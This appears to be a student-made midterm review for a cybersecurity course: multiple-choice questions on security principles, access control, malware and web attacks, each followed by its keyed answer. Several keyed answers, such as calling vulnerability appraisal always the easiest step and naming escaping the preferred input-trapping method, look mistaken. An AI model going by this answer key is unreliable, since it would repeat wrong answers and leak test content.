CSCI 464 (Multiple Choice) Midterm Review

Each of the following is a characteristic of cybercrime except _____. a. targeted attacks against financial networks. b. unauthorized access to information c. theft of personal information d. exclusive use of worms and viruses

D. Exclusive use of worms & viruses

Which of the following should be carried out to address known software vulnerabilities of a specific application? Change the hardware Change the software Install a security patch Remove the application

Install a security patch

Each of the following is a state of a port that can be returned by a port scanner except a. open b. busy c. blocked d. closed

b. busy

Security audits help ensure that your rules and __________ are up to date, documented, and subject to change control procedures. recommendations configurations applications mitigation activities

configurations

____________ is the practice of hiding data and keeping it away from unauthorized users. cryptography encryption cybersecurity ciphertext

cryptography

Which of the following is the definition of netcat? An e-mail or instant-message spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. The mode in which sniffers operate; it is nonintrusive and does not generate network traffic. This means that every data packet is captured and can be seen by the sniffer. Software designed to infiltrate one or more target computers and follow an attacker's instructions. A network utility program that reads from and writes to network connections.

A network utility program that reads from and writes to network connections.

A set of changes done to any program or application with the aim of updating, fixing or improving it is often referred to as what? A hack A patch An install A fix

A patch

What is meant by firewall? A network utility program that reads from and writes to network connections. A program or dedicated hardware device that inspects network traffic passing through it and denies or permits that traffic based on a set of rules you determine at configuration. An e-mail or instant-message spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. A type of attack in which the attacker takes control of a session between two machines and masquerades as one of them.

A program or dedicated hardware device that inspects network traffic passing through it and denies or permits that traffic based on a set of rules you determine at configuration.

A port scan returns an 'open' response. What does this mean? A service is listening on the port Connections to the port will be denied There was no reply from the host

A service is listening on the port

Which term describes the layer of software that resides between the virtual operating system and the physical hardware it runs on in a virtualization environment? A) Hypervisor B) Virtual machine C) Workload management D) Virtual hard disk

A) Hypervisor

If a program allocates a space in RAM for an input and then attempts to read in an input that is too large for that space, what might occur? A. buffer overflow B. SQL injection C. trapped exception D. none of the above

A. Buffer overflow

Which one of the following is an example of a disclosure threat? A. Espionage B. Alteration C. Denial D. Destruction

A. Espionage

Mark is considering outsourcing security functions to a third-party service provider. What benefit is he most likely to achieve? Reduced operating costs Access to a high level of expertise Developing in-house talent Building internal knowledge

Access to a high level of expertise

Ed wants to make sure that his system is designed in a manner that allows tracing actions to an individual. Which phase of access control is Ed concerned about? Identification Authentication Authorization Accountability

Accountability

Carrying out a multi-phase, long-term, stealthy and advanced operation against a specific target is often referred to as what? Advanced persistent threat Network sniffing Social engineering Script kiddies Rainbow tables

Advanced persistent threat

The first thing to do when performing a security assessment for a client is: Scan the network to identify potentially vulnerable systems and ports Discover services running on their network Agree on a scope and objective for the security assessment Collect evidence of vulnerabilities

Agree on a scope and objective for the security assessment

which of the following are challenges that IoT industry must overcome? security and privacy interoperability and standards legal and regulatory compliance e-commerce and economic development All of the above

All of the above

Select the BEST answer to improve virtualization security: Pay attention to trust boundaries. Use the right virtualization technology for the application. Employ Mandatory Access Control (MAC). All of the above.

All of the above.

What is the best method to prevent Bluetooth from being exploited? Always disable Bluetooth when it is not being used Always use a VPN when connecting with Bluetooth Only use Bluetooth to connect to another smartphone or tablet Only use Bluetooth when connecting to a known SSID

Always disable Bluetooth when it is not being used

Which of the following examples illustrates how malware might be concealed? A botnet of zombies carry personal information back to the hacker A hacker uses techniques to improve the ranking of a website so that users are redirected to a malicious site An attack is launched against the public website of an online retailer with the objective of blocking its response to visitors An email is sent to the employees of an organization with an attachment that looks like an antivirus update, but the attachment actually consists of spyware

An email is sent to the employees of an organization with an attachment that looks like an antivirus update, but the attachment actually consists of spyware

What is the last stage of a pen test? Scanning Analysis and reporting Gathering target information Maintaining access

Analysis and reporting

Which action is the best step to protect Internet of Things (IoT) devices from becoming the entry point for security vulnerabilities into a network while still meeting business requirements? Applying security updates promptly Using encryption for communications Removing IoT devices from the network Turning IoT devices off when not in use

Applying security updates promptly

What are examples of multi-factor authentication? Authentication that requires factoring large numbers together Authentication based on something you know, something you have and something you are Authentication that considers multiple factors of the system before allowing access Authentication that asks the user to factor multiple numbers

Authentication based on something you know, something you have and something you are

Janet is identifying the set of privileges that should be assigned to a new employee in her organization. Which phase of the access control process is she performing? Identification Authentication Accountability Authorization

Authorization

Rachel is investigating an information security incident that took place at the high school where she works. She suspects that students may have broken into the student records system and altered their grades. If correct, which one of the tenets of information security did this attack violate? A. Confidentiality B. Integrity C. Availability D. Nonrepudiation

B

which security model does protect the confidentiality of information? A. BIBA B. Bell-LaPadula C. Brewer and Nash D. Clark-Wilson

B. Bell-LaPadula

The use of computing data or services is lost temporarily or permanently, without damage to the physical hardware is called a ________ ? A. Ransomware attack B. Denial of service C. Forgery D. Worm

B. Denial of Service

What amendment protects an individual from unreasonable searches and seizures in terms of their devices? A. First B. Fourth C. Eighth D. Tenth

B. Fourth

A business has the following SC: {(Confidentiality, High), (Integrity, Low), (Availability, Low)}. Based on this information, which attack would have the largest impact on a business? A. subversion B. disclosure C. denial of service D. any of the above

B. disclosure

What of the following are examples of cracking an encrypted password? (Choose four correct answers) Intimidation Brute force attack Network sniffing Rainbow tables Social engineering Spraying Dictionary attack

Brute force attack Rainbow tables Spraying Dictionary attack

Which type of password attack attempts all possible combinations of a password in an attempt to guess the correct value? Dictionary attack Rainbow table attack Social engineering attack Brute-force attack

Brute-force attack

What vulnerability occurs when data is written beyond the memory areas allocated to an application? Buffer overflow Access control problems Race conditions Weaknesses in security practices Non-validated input

Buffer overflow

Which attack strategy is Turing complete? A. return to libc B. borrowed code chunks C. return-oriented programming D. A and B

C

Which of the following frameworks identifies controls based on the latest information about common cyber attacks and provides benchmarks for various platforms? CSA The National Cybersecurity Workforce CIS ISO

CIS

You are configuring access settings to require employees in your organization to authenticate first before accessing certain web pages. Which requirement of information security is addressed through this configuration? Scalability Availability Integrity Confidentiality

Confidentiality

A port scan returns a 'closed' response. What does this mean? There was no reply from the host A service is listening on the port Connections to the port will be denied

Connections to the port will be denied

What encryption algorithm is partially homomorphic by accident? A. ECDSA B. Diffie-Hellman C. RSA

C. RSA

During which phase of the access control process does the system answer the question,"What can the requestor access?" Identification Authentication Authorization Accountability

Authorization

An organization is experiencing overwhelming visits to a main web server. You are developing a plan to add a couple of more web servers for load balancing and redundancy. Which requirement of information security is addressed by implementing the plan? Scalability Integrity Confidentiality Availability

Availability

Which one of the following is not a good technique for performing authentication of an end user? A. Password B. Biometric scan C. Identification number D. Token

C. Identification number

Betty receives a cipher text message from her colleague Tim. What type of function does Betty need to use to read the plaintext message? Encryption Hashing Decryption Validation

Decryption

What can the skills developed by cybersecurity professionals be used for? Cybersecurity professionals develop many skills that can be only be used for good Cybersecurity professionals develop many skills that can only be used for evil Cybersecurity professionals develop many skills that cannot be used for evil Cybersecurity professionals develop many skills that can be used for good or evil

Cybersecurity professionals develop many skills that can be used for good or evil

What is the difference between a hacker and a cybersecurity professional? Hackers only operate within legal boundaries Cybersecurity professionals must work within legal boundaries Hackers have special skills that cybersecurity professionals do not Cybersecurity professionals must not have the same skills as hackers

Cybersecurity professionals must work within legal boundaries

Which of the following statements describes cyberwarfare? Cyberwarfare is an attack carried out by a group of script kiddies Cyberwarfare is simulation software for Air Force pilots that allows them to practice under a simulated war scenario Cyberwarfare is a series of personal protective equipment developed for soldiers involved in nuclear war Cyberwarfare is an Internet-based conflict that involves the penetration of information systems of other nations

Cyberwarfare is an Internet-based conflict that involves the penetration of information systems of other nations

What are the two objectives of ensuring data integrity? (Choose two) Data is available all the time Data is unaltered during transit Access to data is authenticated Data is not changed by unauthorized entities Data is encrypted while in transit and when stored on disks

Data is unaltered during transit Data is not changed by unauthorized entities

Which of the following defines network mapping? A method of security testing that isn't based directly on knowledge of a program's architecture. The standard by which your computer or device is compared to determine if it is securely configured. Using tools to determine the layout and services running on an organization's systems and networks. A process of finding the weaknesses in a system and determining which places may be attack points.

Using tools to determine the layout and services running on an organization's systems and networks.

You have been asked to perform an analysis of the current state of an organization's network. What would you use to scan the network only for security risks? Vulnerability scanner Packet analyzer Pen test Malware

Vulnerability scanner

Each of the following is an action that a virus can take except _____ a. transport itself through the network to another device b. cause a computer to crash c. erase files from a hard drive d. make multiple copies of itself and consume all of the free space in a hard drive

a. transport itself through the network to another device

An example of a(n) _____ is a software defect in an operating system that allows an unauthorized user to gain access to a computer without a password. a. vulnerability b. threat c. threat agent d. asset exploit (AE)

a. vulnerability

Mallory (an attacker) forced Alice to log into her google account. Her goal was to obtain information about Alice's search history.What kind of vulnerability most likely Mallory exploited to launch the attack? a.) CSRF b.) Phishing c.) SQL Injection d.) XSS

a.) CSRF

A web programmer wants to create a site that is capable of dynamically generating variables based on user input. Which language should the programmer use to help generate that dynamic data? a.) PHP b.) LMTH c.) HTML d.) PGP

a.) PHP

When the code that the attacker injects into a website remains on the website for a period of time and is visible to other users​, it is called what type of attack? a.) Stored XSS b.) SQL Injection c.) Reflected XSS d.) Half-persistent XSS

a.) Stored XSS

What term is used to describe associating actions with users for later reporting and research? event-based synchronization system ownership accountability constrained user interface

accountability

Which option is an important characteristic or capability of advanced malware? distributed, fault-tolerant architecture multi-functionality hiding techniques such as polymorphism, metamorphism, and obfuscation all of the above

all of the above

What are two methods that ensure confidentiality? (Choose two.) authorization availability nonrepudiation authentication integrity encryption

authentication encryption

A company is experiencing overwhelming visits to a main web server. The IT department is developing a plan to add a couple more web servers for load balancing and redundancy. Which requirement of information security is addressed by implementing the plan? integrity scalability availability confidentiality

availability

The protocol File Transfer Protocol (FTP) uses which two ports? a. 19 and 20 b. 20 and 21 c. 21 and 22 d. 22 and 23

b. 20 and 21

Each of the following is a goal of information security except _____. a. prevent data b. decrease user productivity c. avoid legal consequences d. foil cyberterrorism

b. decrease user productivity

After an attacker probed a computer or network for information she would next _____. a. modify security settings b. penetrate any defenses c. paralyze networks and devices d. circulate to other systems

b. penetrate any defenses

Attackers use buffer overflows to ____ a. corrupt the kernel so the computer cannot reboot b. point to another area in data memory that contains the attacker's malware code c. place a virus into the kernel d. erase buffer overflow signature files

b. point to another area in data memory that contains the attacker's malware code

Which statement best describes the principle of least privilege? a. Only allow the minimum number of defined users to access asystem. b. An object should allow only data owners to access it. c. A subject should be granted only the permissions to accomplish a task and nothing more. d. An object should grant access only to subjects through onemodel and nothing more.

c. A subject should be granted only the permissions to accomplish a task and nothing more.

Access and activity monitoring supports what security principle? a. Availability b. Least privilege c. Accountability d. Liability

c. Accountability

What are three methods that can be used to ensure confidentiality of information? (Choose three.) data encryption backup file permission settings username ID and password two-factor authentication version control

data encryption username ID and password two-factor authentication

What are three states of data during which data is vulnerable? (Choose three.) data in-process stored data data in-transit data encrypted purged data data decrypted

data in-process stored data data in-transit

For what purpose would a network administrator use the Nmap tool? detection and identification of open ports protection of the private IP addresses of internal hosts identification of specific network anomalies collection and analysis of security alerts and logs

detection and identification of open ports

What is the motivation of a white hat attacker? discovering weaknesses of networks and systems to improve the security level of these systems studying operating systems of various platforms to develop a new system taking advantage of any vulnerability for illegal personal gain fine tuning network devices to improve their performance and efficiency

discovering weaknesses of networks and systems to improve the security level of these systems

For all the technical solutions you can devise to secure your systems, the __________remains your greatest challenge. human element administration certifier regulations

human element

Which of the following is not a type of authentication? ownership characteristics identification knowledge

identification

The world needs people who understand computer-systems ________ and who can protect computers and networks from criminals and terrorists. applications integrity connectivity security

security

What fills security gaps and software weaknesses? cryptography testing and quality assurance data classification standard cybersecurity

testing and quality assurance

Users report that the network access is slow. After questioning the employees, the network administrator learned that one employee downloaded a third-party scanning program for the printer. What type of malware might be introduced that causes slow performance of the network? virus worm spam phishing

worm

What malware exploited IoT security weaknesses to deliver a record-setting DDoS attack. Mirai Stuxnet Wannacry Fuzzykittens

Mirai

Which mitigation plan is most appropriate to limit the risk of unauthorized access to workstations? Password protection Antivirus software Deactivating USB ports Vulnerability scanning

Password protection

A medical office employee sends emails to patients about their recent visits to the facility. What information would put the privacy of the patients at risk if it was included in the email? Contact information Next appointment Patient records First and last name

Patient records

Developers want to log Security-Enhanced Linux (SELinux) access violations without triggering access errors. What SELinux mode of operation should they use? Disabled Permissive Enforcing Targeted

Permissive

What is the only way of ensuring that deleted files on your computer are irrecoverable? Emptying your computer's recycle bin Physically destroying your computer's hard drive Using a software program such as SDelete or Secure Empty Trash

Physically destroying your computer's hard drive

What is the best approach to prevent a compromised IoT device from maliciously accessing data and devices on a local network? Install a software firewall on every network device. Place all IoT devices that have access to the Internet on an isolated network. Disconnect all IoT devices from the Internet. Set the security settings of workstation web browsers to a higher level.

Place all IoT devices that have access to the Internet on an isolated network.

Which of the following are categories of security measures or controls? (Choose three correct answers) Firewalls Guards Camera Policy and procedure Technology Awareness, training and education

Policy and procedure Technology Awareness, training and education

In networking, what name is given to the identifier at both ends of a transmission to ensure that the right data is passed to the correct application? IP address Port number MAC address Sequence number

Port number

What is typically the first phase of a cyber attack. Reconnaisance Delivery Command and Control Exploitation

Reconnaisance

Select the secure alternative to the telnet protocol: HTTP STLS IPsec SSH

SSH

A company is attempting to lower the cost in deploying commercial software and is considering a cloud based service. Which cloud based service would be best to host the software? PaaS RaaS SaaS IaaS

Saas

Which law was enacted to prevent corporate accounting-related crimes? The Federal Information Security Management Act Gramm-Leach-Bliley Act Import/Export Encryption Act Sarbanes-Oxley Act

Sarbanes-Oxley Act

You are having difficulty remembering passwords for all of your online accounts. What should you do? Write the passwords down and keep them out of sight Share the passwords with a network administrator or computer technician Save the passwords in a centralized password manager program Create a single strong password to be used across all online accounts

Save the passwords in a centralized password manager program

Which of the following is not a Tenant of Information Systems Security Confidentiality Integrity Security Availability

Security

What is the main function of the Cisco Security Incident Response Team? To design next generation routers and switches that are less prone to cyber attacks To design polymorphic malware To ensure company, system and data preservation To provide standards for new encryption techniques

To ensure company, system and data preservation

A port scan returns a 'dropped' response. What does this mean? A service is listening on the port Connections to the port will be denied There was no reply from the host

There was no reply from the host

Why should a software developer "Think like a hacker"? They build systems anticipating ways their code will be hacked They can insert back doors and quickly bypass authentication to improve testing They build software that incorporates malware They build software that cannot be hacked

They build systems anticipating ways their code will be hacked

Which term describes any action that could damage an asset? Risk Countermeasure Vulnerability Threat

Threat

Stuxnet malware was designed for which primary purpose? To hijack and take control of targeted computers To cause physical damage to equipment controlled by computers To cause serious harm to workers in a nuclear enrichment plant

To cause physical damage to equipment controlled by computers

What is the purpose of a backdoor? To enable software vendors to update software For government access To gain unauthorized access to a system without normal authentication procedures To allow developers to debug software

To gain unauthorized access to a system without normal authentication procedures

What is the main aim of a Cyber Security Incident Response Team (CSIRT)? To help client organizations improve their incident management capabilities To help ensure organization, system and data preservation by performing investigations into computer security incidents To enforce access to network resources by creating role-based control policies To provide guidance on the implementation of safeguards and personnel training

To help ensure organization, system and data preservation by performing investigations into computer security incidents

During what phase of the ML/AI model lifecycle does data poisoning occur? Testing phase Training phase Inference phase Deployment phase

Training phase

Breanne's system was infected by malicious code after she installed an innocent-looking solitaire game that she downloaded from the Internet. What type of malware did she likely encounter? Virus Worm Trojan horse Logic bomb

Trojan horse

An employee is at a restaurant with friends and tells them about an exciting new video game that is under development at the organization they work for. Is this employee's behavior ethical or unethical? Ethical Unethical

Unethical

An employee is laid off after fifteen years with the same organization. The employee is then hired by another organization within a week. In the new organization, the employee shares documents and ideas for products that the employee proposed at the original organization. Is the employee's behavior ethical or unethical? Ethical Unethical

Unethical

One of your colleagues has lost her identification badge. She is in a hurry to get to a meeting and does not have time to visit Human Resources to get a temporary badge. You lend her your identification badge until she can obtain a replacement.Is this behavior ethical or unethical? Ethical Unethical

Unethical

Which one of the following is NOT a commonly accepted best practice for password security? Use at least six alphanumeric characters. Do not include usernames in passwords. Include a special character in passwords. Include a mixture of uppercase characters, lowercase characters, and numbers in passwords.

Use at least six alphanumeric characters.

Which of the following is a requirement of a strong password? Use special characters such as ! @ or $ Use at least six characters Use a dictionary word or a common statement that you'll remember

Use special characters such as ! @ or $

If you receive an email containing a link or attachment, you should (pick the best answer): Click on it or download the attachment to see what it does Verify the email authenticity through other channels (e.g., website, phone) Forward the email to another friend to see if they got it, too Forward the email to all your friends to see what they think

Verify the email authenticity through other channels (e.g., website, phone)

If developers attempt to create their own security algorithms, it will likely introduce what type of vulnerabilities? Buffer overflow Race conditions Weaknesses in security practices Non-validated input Access control problems

Weaknesses in security practices

Yuri is a skilled computer security expert who attempts to break into the systems belonging to his clients. He has permission from the clients to perform this testing as part of a paid contract. What type of person is Yuri? Cracker White-hat hacker Black-hat hacker Grey-hat hacker

White-hat hacker

What tool might be used by an attacker during the reconnaissance phase of an attack to glean information about domain registrations? Whois Simple Network Management Protocol (SNMP) Ping Domain Name System (DNS)

Whois

Which of the following is an example of two factor authentication? Your answer to a general knowledge question and your password Your password and your username Your fingerprint and your password Your account number and your name

Your fingerprint and your password

Which technology removes direct equipment and maintenance costs from the user for data backups? a cloud service network attached storage a tape an external hard drive

a cloud service

What is an example of the a Cyber Kill Chain? a group of botnets a planned process of cyberattack a series of worms based on the same core code a combination of virus, worm, and Trojan Horse

a planned process of cyberattack

What is a session token? a. A random string assigned by a Web server b. The same as a third-party cookie c. A unique identifier that includes the user's e-mail address d. XML code used in an XML injection attack

a. A random string assigned by a Web server

What is the best definition for the term authentication? a. A subject presents credentials to claim an identity. b. The access control system looks up permissions assigned to a subject. c. The access control system searches a user database to see if the subject exists. d. A subject provides additional information that should match information the access control system stores for that subject.

a. A subject presents credentials to claim an identity.

Which of the following cookies only lasts for the duration of visiting the Web site? a. Session b. Persistent c. Temporary d. RAM

a. Session

Which of the following is true regarding vulnerability appraisal? a. Vulnerability appraisal is always the easiest and quickest step. b. Every asset must be viewed in light of each threat. c. Each threat could reveal multiple vulnerabilities. d. Each vulnerability should be cataloged.

a. Vulnerability appraisal is always the easiest and quickest step.

Each of the following is a step in risk management except ____ a. attack assessment b. vulnerability appraisal c. threat evaluation d. risk mitigation

a. attack assessment

Utility, telecommunications, and finanical services companies are considered prime targets of _____ because attackers can significantly disrupt business and personal activites by destroying a few targets. a. cyberterrorists b. kiddie scripters c. computer spies d. blue hat hackers (BHH)

a. cyberterrorists

The term ____ is commonly used in a generic sense to identify anyone who illegally breaks into a computer system. a. hacker b. cyberterrorist c. Internet Exploiter d. cyberrogue

a. hacker

A cross-site request forgery (XSRF) ____ a. is used to inherit the identity and privileges of the victim b. is identical to cross-site scripting (XSS) c. cannot be blocked d. can only be used with a Web-based e-mail client

a. is used to inherit the identity and privileges of the victim

The basis of a SQL injection attack is _____ a. to inject SQL statements through unfiltered user input b. to have the SQL server attack client Web browsers c. to link SQL servers into a botnet d. to expose SQL code so that it can be examined

a. to inject SQL statements through unfiltered user input

Which access control models primarily support data integrity?(Choose all that apply.) a. Bell-LaPadula b. Biba c. State machine

b. Biba

When an attacker can access files in directories other than the root directory, this is known as a(n) attack. a. Command injection b. Directory traversal c. SQL injection d. XML injection

b. Directory traversal

Which of the following types of attacks is not normally considered a malicious code object? a. Virus b. DoS c. Worm d. Trojan horse

b. DoS

If someone has made a transaction with a company, later he has denied that. The companyneeds to protect itself from such a situation. Here, what is the security situation refereeing to? a. Availability b. Nonrepudiation c. Access control d. Authentication

b. Nonrepudiation

The most important step in the sense of security is being able to ________ a security threat concern. a. Evade b. Recognize c. Challenge d. Log

b. Recognize

You're a security consultant that must find the method an attacker used to breach an organization. Upon investigation, you notice that one of their input forms on a web page is not sanitizing the input data before running the command against the back-end database. What is the most likely attack vector used during the breach? a.) Web-Form Injection b.) SQL Injection c.) CSRF d.) XSS

b.) SQL Injection

A janitor cleaning the floor of an organization's data center accidentally tripped over a power cord and cut the power to a critical file server. Users who depend on that data to complete their job functions are unable to access it and must take time off from work until IT personnel arrive and restore power to the computer. What security principle is most involved in this incident? a. Confidentiality b. Integrity c. Denial d. Alteration

c. Denial

Which type of attack uses a list of common passwords? a. Brute force attack b. Spoofing attack c. Dictionary attack d. Smurf attack

c. Dictionary attack

Which is the preferred means of trapping user input for errors? a. Input validation b. On-Trap input c. Escaping d. Fuzz testing

c. Escaping

Matthew's manager Renee recently informed him that she was concerned about the possibility of a hacker tapping into their corporate database and altering customer records. What security goal is Renee concerned about achieving? a. Confidentiality b. Alteration c. Integrity d. Availability

c. Integrity

Which part of a well-designed cryptographic system is responsible for maintaining the secrecy of communications? a. Identity of sender b. Algorithm c. Key d. Time of use

c. Key

Which of the following is the most secure protocol for transferring files? a. SCP b. FTPS c. SFTP d. FTP

c. SFTP

Which one of the following security principles explains a practice that security administrators should NOT follow when designing an information security program for their organization? a. Defense in depth b. Least privilege c. Security through obscurity d. Separation of privileges

c. Security through obscurity

A __ requires a user to transport it from one computer to another. a. worm b. rootkit c. Virus d. Trojan

c. Virus

What is unique about a cross-site scripting (XSS) attack compared to other injection attacks? a. SQL code is used in an XSS attack. b. XSS requires the use of a browser. c. XSS does not attack the Web application server to steal or corrupt its information. d. XSS attacks are rarely used anymore compared to other injection attacks.

c. XSS does not attack the Web application server to steal or corrupt its information.

Each of the following is a reason why it is difficult to defend against today's attackers except _____. a. speed of attacks b. greater sophistication of attacks c. complexity of attack tools d. delays in patching hardware and software products

c. complexity of attack tools

An example of _____ would be not revealing the type of computer, operating system, software, & network connection a computer uses. a. diversity b. Iimiting c. obscurity d. layering

c. obscurity

The failure of a security administrator to apply the most recent security patches to a system is an example of ________________. a. threat b. risk c. vulnerability d. malicious code e. denial of service

c. vulnerability

A is a systematic and methodical evaluation of the exposure of assets to attackers, forces of nature, or any other entity that is a potential harm. a. penetration test b. vulnerability scan c. vulnerability assessment d. risk appraisal (RAP)

c. vulnerability assessment

A security professional is concerned about the company web browsers running a script from a vulnerable site and malicious script from a malicious site. What type of attack is the security professional concerned about? a.) Injection b.) XSS c.) CSRF d.) HTTPS

c.) CSRF

Bob is developing a dynamic web application that depends on a database backend. What type of attack could a malicious individual use to send commands through his web application to the database? a.) Non Persistent XSS b.) Click Jacking c.) SQL Injection d.) Persistent XSS

c.) SQL Injection

Bob recently viewed an auction listing on a website. The item he wants is too expensive and decides to use an attack to lower the price of the item. What type of attack should Bob use? a.) Command Injection b.) Cross Site Request Forgery c.) SQL Injection d.) Cross Site Scripting (XSS)

c.) SQL Injection

A web server administrator is configuring access settings to require users to authenticate first before accessing certain web pages. Which requirement of information security is addressed through the configuration? integrity scalability availability confidentiality

confidentiality

Larry recently viewed an auction listing on a website. As a result, his computer executed code that popped up a window that asked for his password. What type of attack has Larry likely encountered? Select one: a. SQL injection b. Command injection c. XML injection d. Cross-site scripting (XSS)

d. Cross-site scripting (XSS)

_____ requires banks and financial institutions to alert customers of their policies & practices in disclosing customer information & to protect all electronic & paper containing personally identifiable financial information a. California Savings & Loan Security Act (CS&LSA) b. USA Patriot Act c. Sabanes-Oxley Act (Sarbox) d. Gramm-Leach-Bliley Act (GLBA)

d. Gramm-Leach-Bliley Act (GLBA)

Which of the following cannot be performed through a successful SQL injection attack? a. Display a list of customer telephone numbers .b. Discover the names of different fields in a table. c. Erase a database table. d. Reformat the Web application server's hard drive.

d. Reformat the Web application server's hard drive.

____ constructs scenarios of the types of threats that assets can face in order to learn who the attackers are, why they attack, and what types of attacks may occur. a. Vulnerability prototyping b. Risk assessment c. Attack assessment d. Threat modeling

d. Threat modeling

A ______ attack exploits previously unknown vulnerabilities. a. virus resource b. shock and awe c. surprised. d. zero day

d. zero day

Which of the following is a proper defense against XSS attack. a.) Checking that inputs are in the expected form b.) Escaping dynamic data before inserting them into HTML c.) Sanitizing data before sending them to the database d.) All of these are defense mechanisms against XSS

d.) All of these are defense mechanisms against XSS

What type of attack uses forged web pages created to fraudulently acquire sensitive information? a.) SQL Injection b.) XSS c.) CSRF d.) Phishing

d.) Phishing

When an attacker gets the user to click on a specially crafted URL with script in it and the web service reflects it back, what type of attack is that called? a.) Stored XSS b.) SQL Injection c.) Half-persistent XSS d.) Reflected XSS

d.) Reflected XSS

Which two methods help to ensure data integrity? (Choose two.) data consistency checks privacy hashing availability authorization repudiation

data consistency checks hashing

Which term refers to a software implementation of a computer system that executes programs like a physical machine? A) Workload management B) Hypervisor C) Physical host D) Virtual machine

D) Virtual machine

Match the type of cyber attackers to the description. (Not all options are used.) terrorists state-sponsored attackers hacktivists script kiddies gather intelligence or commit sabotage on specific goals on behalf of their government ————-> make political statements, or create fear, by causing physical or psychological damage to victims ———-> make political statements in order to create an awareness of issues that are important to them ————>

gather intelligence or commit sabotage on specific goals on behalf of their government ————-> state-sponsored attackers make political statements, or create fear, by causing physical or psychological damage to victims ———-> terrorists make political statements in order to create an awareness of issues that are important to them ————> hacktivists

A user is surfing the Internet using a laptop from a public WiFi cafe. What should be checked first when the user connects to the public network? if the laptop has a master password set to secure the passwords stored in the password manager if the laptop requires user authentication for file and media sharing if the laptop web browser is operating in private mode if the laptop Bluetooth adapter is disabledExplanation:

if the laptop requires user authentication for file and media sharing

Which term below is frequently used to describe the tasks of securing information that is in a digital format? network security information security physical security logical security

information security

Select the information protection item that ensures that information is correct and that no unauthorized person or malicious software has altered that data availability confidentiality integrity identity

integrity

Connecting your computers or devices to the ________ immediately exposes them to attack. network ethernet internet virtual LAN; VLAN

internet

What is the most difficult part of designing a cryptosystem? encryption algorithm reverse engineering key length key management

key management

A Zero Trust network security model is based on which security principle? due diligence least privilege non-repudiation negative control

least privilege

What is the last stage of the Cyber Kill Chain framework? remote control of the target device creation of malicious payload gathering target information malicious action

malicious action

When an attacker promotes themselves as reputable third-party advertisers to distribute their malware through the Web ads, what type attack is being performed? ad squatting clickjacking malvertising ad spoofing

malvertising

Mutual authentication can prevent which type of attack? wireless poisoning wireless IP spoofing wireless sniffing man-in-the-middle

man-in-the-middle

A network administrator is conducting a training session to office staff on how to create a strong and effective password. Which password would most likely take the longest for a malicious user to guess or break? mk$$cittykat104# drninjaphd super3secret2password1 10characters

mk$$cittykat104#

Which type of attack allows an attacker to use a brute force approach? social engineering denial of service packet sniffing password cracking

password cracking

A medical office employee sends emails to patients about recent patient visits to the facility. What information would put the privacy of the patients at risk if it was included in the email? patient records first and last name contact information next appointment

patient records

What is another name for confidentiality of information? trustworthiness privacy accuracy consistency

privacy

Malware that locks or prevents a device from functioning properly until a fee has been paid is known as: lockware ransomware stealware hostageware

ransomware

Which stage of the kill chain used by attackers focuses on the identification and selection of targets? delivery exploitation weaponization reconnaissance

reconnaissance

Another type of attacker is called a ________. This is a person with little or no skill who simply follows directions or uses a "cookbook"approach to carrying out a cyberattack without understanding the meaning of the steps he or she is performing. hacker script kiddie white-hat hacker black-hat hacker

script kiddie

The ___________ is the central part of a computing environment's hardware, software, and firmware that enforces access control. security kernel CPU memory co-processor

security kernel

Your organization's __________ sets the tone for how you approach related activities. guidelines security policy assets configuration

security policy

One of the most popular types of attacks on computer systems involves ___________. These attacks deceive or use people to get around security controls. The best way to avoid this risk is to ensure that employees know how to handle such attacks. World Wide Web cloud computing worms social engineering

social engineering

In which cloud computing service model does a provider's applications run on a cloud infrastructure and the consumer does not manage or control the underlying infrastructure? platform as a service (PaaS) infrastructure as a service (IaaS) software as a service (SaaS) public cloud

software as a service (SaaS)

What is an impersonation attack that takes advantage of a trusted relationship between two systems? man-in-the-middle spoofing spamming sniffing

spoofing

which type of attack against a web application uses a newly discovered vulnerability that is not patchable? A. SQL Injection B. Cross-Site Scripting C. Cross-Site request forgery D. Zero-day Attack

D. Zero-day Attack

Which access control strategy allows an object owner to determine whether to allow access to the object? RBAC DAC MAC ACL

DAC

An organization's IT department reports that their web server is receiving an abnormally high number of web page requests from different locations simultaneously. What type of security attack is occurring? Phishing Adware Social engineering DDoS Spyware

DDoS

What type of attack disrupts services by overwhelming network devices with bogus traffic? DDoS Zero-day Brute force Port scans

DDoS

What type of attack is being performed when multiple computers overwhelm a system with fake requests? DDoS DoS SYN flood replay attacks

DDoS

You have stored your data on a local hard disk. Which method would secure this data from unauthorized access? Data encryption Two factor authentication Duplication of the hard drive Deletion of sensitive files

Data encryption

What are the objectives of ensuring data integrity? (Choose two correct answers) Data is unaltered during transit Data is not changed by unauthorized entities Data is encrypted while in transit and when stored on disks Access to the data is authenticated Data is available all the time

Data is unaltered during transit Data is not changed by unauthorized entities

A cybercriminal sends a series of maliciously formatted packets to a database server, which causes the server to crash. What do you call this type of attack? SQL injection DoS Man-in-the-middle Packet injection

DoS

Curtis is conducting an audit of an identity management system. Which question is NOT likely to be in the scope of his audit? Does the organization have an effective password policy? Does the firewall properly block unsolicited network connection attempts? Who grants approval for access requests? Is the password policy uniformly enforced?

Does the firewall properly block unsolicited network connection attempts?

What mitigations did return to libraries or return to libc defeat? A. signed code B. non-executable memory C. Data Execute Prevention (DEP) D. All of the above E. A and B

E

An employee points out a design flaw in a new product to the department manager. Is this employee's behavior ethical or unethical? Ethical Unethical

Ethical

During a meeting with the Marketing department, a representative from IT discusses features of an upcoming product that will be released next year. Is this employee's behavior ethical or unethical? Ethical Unethical

Ethical

The risk management process consists of four steps. Can you put these in the right order? Respond to the risk Assess the risk Monitor the risk Frame the risk

Frame the risk Assess the risk Respond to the risk Monitor the risk

What is a reason that internal security threats might cause greater damage to an organization than external security threats? Internal users can access the infrastructure devices through the Internet. Internal users can access the corporate data without authentication. Internal users have direct access to the infrastructure devices. Internal users have better hacking skills.

Internal users have direct access to the infrastructure devices.

Can you identify why each of the following organizations might be interested in your online identity? Internet service providers: Advertisers: Social media platforms: Websites:

Internet service providers:- They may be legally required to share your online information with government surveillance agencies or authorities Advertisers:- To monitor your online activities and send targeted ads your way Social media platforms:- To gather information based on your online activity, which is then shared with or sold to advertisers for a profit Websites:- To track your activities using cookies in order to provide a more personalized experience

Which statement describes cyberwarfare? Cyberwarfare is an attack carried out by a group of script kiddies. It is simulation software for Air Force pilots that allows them to practice under a simulated war scenario. It is a series of personal protective equipment developed for soldiers involved in nuclear war. It is Internet-based conflict that involves the penetration of information systems of other nations.

It is Internet-based conflict that involves the penetration of information systems of other nations.
